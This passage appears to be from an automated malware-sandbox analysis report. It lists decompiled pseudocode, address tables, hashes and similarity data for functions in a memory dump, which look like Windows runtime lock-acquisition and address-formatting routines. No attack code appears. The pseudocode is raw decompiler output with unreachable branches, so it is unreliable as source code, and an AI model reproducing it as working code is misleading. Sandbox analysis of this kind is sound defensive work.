									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = L00954FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									L00963F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									L00963F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E0099217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									L00963F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									E00953915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x009f01c0;
												_push(_t138);
												_push(0);
												_t58 = E0090F8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = L00954FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												L00963F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												L00963F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E0099217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												L00963F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												E00953915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00935384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = E0090F970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														E00953915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = E0090F970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															E00953915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = E0090F970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = E00953915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L58;
																}
																E00935329(_t110, _t138);
																return E009353A5(_t138, 1);
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L58;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L58;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L58;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L58:
			}



































                                                0x0095055a
                                                0x0095055d
                                                0x00950563
                                                0x00950566
                                                0x009505d8
                                                0x009505e2
                                                0x009505e5
                                                0x00000000
                                                0x009505e7
                                                0x009505e7
                                                0x009505ea
                                                0x009505f3
                                                0x009505f3
                                                0x00950568
                                                0x00950568
                                                0x00950568
                                                0x00950569
                                                0x00950569
                                                0x00950569
                                                0x0095056b
                                                0x00000000
                                                0x00000000
                                                0x0097217f
                                                0x00972183
                                                0x0097225b
                                                0x0097225f
                                                0x00972189
                                                0x0097218c
                                                0x0097218f
                                                0x00972194
                                                0x00972199
                                                0x0097219d
                                                0x009721a0
                                                0x009721a2
                                                0x009721ce
                                                0x009721ce
                                                0x009721ce
                                                0x009721d0
                                                0x009721d6
                                                0x009721de
                                                0x009721e2
                                                0x009721e8
                                                0x009721e9
                                                0x009721ec
                                                0x009721f1
                                                0x009721f6
                                                0x00000000
                                                0x00000000
                                                0x009721f8
                                                0x009721fb
                                                0x00972206
                                                0x0097220b
                                                0x0097220c
                                                0x00972217
                                                0x00972226
                                                0x0097222b
                                                0x0097222c
                                                0x0097222f
                                                0x00972232
                                                0x00972235
                                                0x00972235
                                                0x0097223a
                                                0x0097223f
                                                0x00972241
                                                0x00972243
                                                0x00972248
                                                0x00972248
                                                0x0097224d
                                                0x0097224f
                                                0x00972262
                                                0x00972263
                                                0x00972268
                                                0x00972269
                                                0x00972269
                                                0x00972269
                                                0x0097226d
                                                0x00000000
                                                0x00000000
                                                0x00972276
                                                0x00972279
                                                0x0097227e
                                                0x00972283
                                                0x00972287
                                                0x0097228a
                                                0x0097228d
                                                0x0097228f
                                                0x009722bc
                                                0x009722bc
                                                0x009722bc
                                                0x009722be
                                                0x009722c4
                                                0x009722cc
                                                0x009722d0
                                                0x009722d6
                                                0x009722d7
                                                0x009722da
                                                0x009722df
                                                0x009722e4
                                                0x00000000
                                                0x00000000
                                                0x009722e6
                                                0x009722e9
                                                0x009722f4
                                                0x009722f9
                                                0x009722fa
                                                0x00972305
                                                0x00972314
                                                0x00972319
                                                0x0097231a
                                                0x0097231d
                                                0x00972320
                                                0x00972323
                                                0x00972323
                                                0x00972328
                                                0x0097232d
                                                0x0097232f
                                                0x00972331
                                                0x00972336
                                                0x00972336
                                                0x0097233b
                                                0x0097233d
                                                0x00972350
                                                0x00972351
                                                0x00972356
                                                0x00972359
                                                0x00972359
                                                0x0097235b
                                                0x0097235d
                                                0x00935367
                                                0x0093536b
                                                0x00935372
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00972363
                                                0x00972363
                                                0x00972369
                                                0x0097236a
                                                0x0097236c
                                                0x00972371
                                                0x00972373
                                                0x00000000
                                                0x00972379
                                                0x00972379
                                                0x0097237a
                                                0x0097237f
                                                0x0097237f
                                                0x00972385
                                                0x00972386
                                                0x00972389
                                                0x0097238e
                                                0x00972390
                                                0x00935378
                                                0x0093537c
                                                0x00972396
                                                0x00972396
                                                0x00972397
                                                0x0097239c
                                                0x009723a2
                                                0x009723a3
                                                0x009723a6
                                                0x009723ab
                                                0x009723ad
                                                0x00000000
                                                0x009723b3
                                                0x009723b3
                                                0x009723b4
                                                0x009723b9
                                                0x009723ba
                                                0x009723ba
                                                0x009723bc
                                                0x009723bf
                                                0x00000000
                                                0x00000000
                                                0x00969153
                                                0x00969158
                                                0x0096915a
                                                0x0096915e
                                                0x00969160
                                                0x00000000
                                                0x00969166
                                                0x00969166
                                                0x00969171
                                                0x00969176
                                                0x00969176
                                                0x00000000
                                                0x00969160
                                                0x009723c6
                                                0x009723d7
                                                0x009723d7
                                                0x009723ad
                                                0x00972390
                                                0x00972373
                                                0x0097233f
                                                0x0097233f
                                                0x00000000
                                                0x0097233f
                                                0x00972291
                                                0x00972291
                                                0x00972293
                                                0x00972295
                                                0x0097229a
                                                0x009722a1
                                                0x009722a3
                                                0x009722a7
                                                0x009722a9
                                                0x00000000
                                                0x00000000
                                                0x009722ab
                                                0x009722ad
                                                0x009722af
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009722af
                                                0x009722b1
                                                0x009722b4
                                                0x009722b4
                                                0x009722b6
                                                0x009353be
                                                0x009353be
                                                0x009353be
                                                0x009353c0
                                                0x00000000
                                                0x00000000
                                                0x009353cb
                                                0x009353ce
                                                0x009353d0
                                                0x009353d4
                                                0x009353d6
                                                0x00000000
                                                0x009353d8
                                                0x009353e3
                                                0x009353ea
                                                0x009353ea
                                                0x00000000
                                                0x009353d6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009722b6
                                                0x00000000
                                                0x0097228f
                                                0x00972349
                                                0x0097234d
                                                0x00972251
                                                0x00972251
                                                0x00000000
                                                0x00972251
                                                0x009721a4
                                                0x009721a4
                                                0x009721a6
                                                0x009721a8
                                                0x009721ac
                                                0x009721b6
                                                0x009721b8
                                                0x009721bc
                                                0x009721be
                                                0x00000000
                                                0x00000000
                                                0x009721c0
                                                0x009721c2
                                                0x009721c4
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009721c4
                                                0x009721c6
                                                0x009721c6
                                                0x009721c8
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009721c8
                                                0x009721a2
                                                0x00000000
                                                0x00972183
                                                0x0095057b
                                                0x0095057d
                                                0x00950581
                                                0x00950583
                                                0x00972178
                                                0x00000000
                                                0x00950589
                                                0x0095058f
                                                0x0095058f
                                                0x00950583
                                                0x00000000

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00972206
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-4236105082
                                                • Opcode ID: a49bb86294a84375fe13ad321e4524786f80ad17bfb7e71ac7956e2621d0bc3c
                                                • Instruction ID: 34a331877e6935b1f84647ee9600a8807eb2a515549d6a15d48567cc22dc07bc
                                                • Opcode Fuzzy Hash: a49bb86294a84375fe13ad321e4524786f80ad17bfb7e71ac7956e2621d0bc3c
                                                • Instruction Fuzzy Hash: DB511B727542056FEB14CB19CC81FA633ADAFD8711F21C229FD59DB286E971EC418790
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009514C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E009514C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0x9f2088; // 0x77e481ab
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00947707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E009513CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00947707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00947707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00912340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E0091E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                0x009514c0
                                                0x009514cb
                                                0x009514d2
                                                0x009514d6
                                                0x009514da
                                                0x009514de
                                                0x009514e3
                                                0x0095157a
                                                0x0095157a
                                                0x009514f1
                                                0x009514f3
                                                0x0097ea0f
                                                0x00000000
                                                0x0097ea15
                                                0x00000000
                                                0x0097ea15
                                                0x009514f9
                                                0x009514f9
                                                0x009514fe
                                                0x00951504
                                                0x0097ea1a
                                                0x0097ea1f
                                                0x0097ea21
                                                0x0097ea22
                                                0x0097ea27
                                                0x0097ea2a
                                                0x0097ea2a
                                                0x00951515
                                                0x00951517
                                                0x0095156d
                                                0x00951572
                                                0x00951575
                                                0x00951575
                                                0x0095151e
                                                0x0097ea50
                                                0x0097ea55
                                                0x0097ea58
                                                0x0097ea58
                                                0x0095152e
                                                0x00951531
                                                0x00951533
                                                0x00000000
                                                0x00951535
                                                0x00951541
                                                0x00951549
                                                0x00951549
                                                0x00951533
                                                0x009514f3
                                                0x00951559

                                                APIs
                                                • ___swprintf_l.LIBCMT ref: 0097EA22
                                                  • Part of subcall function 009513CB: ___swprintf_l.LIBCMT ref: 0095146B
                                                  • Part of subcall function 009513CB: ___swprintf_l.LIBCMT ref: 00951490
                                                • ___swprintf_l.LIBCMT ref: 0095156D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: %%%u$]:%u
                                                • API String ID: 48624451-3050659472
                                                • Opcode ID: e49b4aa9e17330fc0bba32bbe3b8ec0e9566f3149d02a51b74ae9deae335e553
                                                • Instruction ID: 89db2ac7ae0434728841614becbdb4821c7fbb1c5351cb5bb8c3ac0fca1ce611
                                                • Opcode Fuzzy Hash: e49b4aa9e17330fc0bba32bbe3b8ec0e9566f3149d02a51b74ae9deae335e553
                                                • Instruction Fuzzy Hash: 0F21C172A00219ABCF21DF59CC41BEEB3BCAB94705F844451FC46D3140EB74AA998BE1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 009353A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 44%
                                                			E009353A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x009f01c0;
									_push(_t92);
									_push(0);
									_t37 = E0090F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = L00954FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									L00963F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									L00963F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E0099217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									L00963F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00953915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00935384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E0090F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00953915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0090F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00953915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0090F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00953915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E00935329(_t74, _t92);
													_push(1);
													return E009353A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

























                                                0x009353ab
                                                0x009353ae
                                                0x009353b1
                                                0x009353b4
                                                0x009353b7
                                                0x009505b6
                                                0x009505c0
                                                0x009505c3
                                                0x00000000
                                                0x009505c9
                                                0x009505c9
                                                0x009505cc
                                                0x009505d5
                                                0x009505d5
                                                0x009353bd
                                                0x009353bd
                                                0x009353bd
                                                0x009353be
                                                0x009353be
                                                0x009353be
                                                0x009353c0
                                                0x00000000
                                                0x00000000
                                                0x00972269
                                                0x0097226d
                                                0x00972349
                                                0x0097234d
                                                0x00972273
                                                0x00972276
                                                0x00972279
                                                0x0097227e
                                                0x00972283
                                                0x00972287
                                                0x0097228a
                                                0x0097228d
                                                0x0097228f
                                                0x009722bc
                                                0x009722bc
                                                0x009722bc
                                                0x009722be
                                                0x009722c4
                                                0x009722cc
                                                0x009722d0
                                                0x009722d6
                                                0x009722d7
                                                0x009722da
                                                0x009722df
                                                0x009722e4
                                                0x00000000
                                                0x00000000
                                                0x009722e6
                                                0x009722e9
                                                0x009722f4
                                                0x009722f9
                                                0x009722fa
                                                0x00972305
                                                0x00972314
                                                0x00972319
                                                0x0097231a
                                                0x0097231d
                                                0x00972320
                                                0x00972323
                                                0x00972323
                                                0x00972328
                                                0x0097232d
                                                0x0097232f
                                                0x00972331
                                                0x00972336
                                                0x00972336
                                                0x0097233b
                                                0x0097233d
                                                0x00972350
                                                0x00972351
                                                0x00972356
                                                0x00972359
                                                0x00972359
                                                0x0097235b
                                                0x0097235d
                                                0x00935367
                                                0x0093536b
                                                0x00935372
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00972363
                                                0x00972363
                                                0x00972369
                                                0x0097236a
                                                0x0097236c
                                                0x00972371
                                                0x00972373
                                                0x00000000
                                                0x00972379
                                                0x00972379
                                                0x0097237a
                                                0x0097237f
                                                0x0097237f
                                                0x00972385
                                                0x00972386
                                                0x00972389
                                                0x0097238e
                                                0x00972390
                                                0x00935378
                                                0x0093537c
                                                0x00972396
                                                0x00972396
                                                0x00972397
                                                0x0097239c
                                                0x009723a2
                                                0x009723a3
                                                0x009723a6
                                                0x009723ab
                                                0x009723ad
                                                0x00000000
                                                0x009723b3
                                                0x009723b3
                                                0x009723b4
                                                0x009723b9
                                                0x009723ba
                                                0x009723ba
                                                0x009723bc
                                                0x009723bf
                                                0x00000000
                                                0x00000000
                                                0x00969153
                                                0x00969158
                                                0x0096915a
                                                0x0096915e
                                                0x00969160
                                                0x00000000
                                                0x00969166
                                                0x00969166
                                                0x00969171
                                                0x00969176
                                                0x00969176
                                                0x00000000
                                                0x00969160
                                                0x009723c6
                                                0x009723cb
                                                0x009723d7
                                                0x009723d7
                                                0x009723ad
                                                0x00972390
                                                0x00972373
                                                0x0097233f
                                                0x0097233f
                                                0x00000000
                                                0x0097233f
                                                0x00972291
                                                0x00972291
                                                0x00972293
                                                0x00972295
                                                0x0097229a
                                                0x009722a1
                                                0x009722a3
                                                0x009722a7
                                                0x009722a9
                                                0x00000000
                                                0x00000000
                                                0x009722ab
                                                0x009722ad
                                                0x009722af
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009722af
                                                0x009722b1
                                                0x009722b4
                                                0x009722b4
                                                0x009722b6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009722b6
                                                0x0097228f
                                                0x00000000
                                                0x0097226d
                                                0x009353cb
                                                0x009353ce
                                                0x009353d0
                                                0x009353d4
                                                0x009353d6
                                                0x00000000
                                                0x009353d8
                                                0x009353e3
                                                0x009353ea
                                                0x009353ea
                                                0x009353d6
                                                0x00000000

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009722F4
                                                Strings
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 009722FC
                                                • RTL: Re-Waiting, xrefs: 00972328
                                                • RTL: Resource at %p, xrefs: 0097230B
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-871070163
                                                • Opcode ID: cba879de21a730e7216a3635e829d9ad6142dfab33ae0ba0d0ac33fbc131fe9d
                                                • Instruction ID: 8357857640b4f4155905fd00884eb2c2839117ec6aad3d23648b0fec3cd8ac04
                                                • Opcode Fuzzy Hash: cba879de21a730e7216a3635e829d9ad6142dfab33ae0ba0d0ac33fbc131fe9d
                                                • Instruction Fuzzy Hash: 5B510872700705ABDB15DB29CC81FA6739CEF98764F118229FD18DB281E661ED418B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0094FCC9, Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.557082724.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                • Associated: 00000005.00000002.557063110.00000000008F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557352130.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557358797.00000000009F0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557366026.00000000009F4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557375040.00000000009F7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557382431.0000000000A00000.00000040.00000001.sdmp Download File
                                                • Associated: 00000005.00000002.557434499.0000000000A60000.00000040.00000001.sdmp Download File
